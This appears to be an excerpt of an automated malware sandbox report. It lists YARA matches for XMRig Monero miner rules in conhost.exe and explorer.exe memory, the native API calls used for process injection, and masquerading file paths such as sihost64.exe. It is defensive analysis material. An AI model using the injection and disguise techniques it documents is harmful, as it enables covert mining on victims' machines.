Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00401D58 NtAllocateVirtualMemory, 10_2_00401D58
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00401D18 NtWriteVirtualMemory, 10_2_00401D18
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_004019D8 NtCreateThreadEx, 10_2_004019D8
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00401D98 NtProtectVirtualMemory, 10_2_00401D98
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00401C98 NtClose, 10_2_00401C98
Source: C:\Windows\System32\conhost.exe Code function: 17_2_00007FFA3625A30E NtUnmapViewOfSection, 17_2_00007FFA3625A30E
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00007FFA3626A3EE NtUnmapViewOfSection, 21_2_00007FFA3626A3EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00401D58 NtAllocateVirtualMemory, 22_2_00401D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00401D18 NtWriteVirtualMemory, 22_2_00401D18
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_004019D8 NtCreateThreadEx, 22_2_004019D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00401D98 NtProtectVirtualMemory, 22_2_00401D98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00401C98 NtClose, 22_2_00401C98
Sample file is different than original file name gathered from version info
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.655959061.000000000370C000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameUrticates.exe4 vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUrticates.exe4 vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.653385005.0000000002590000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
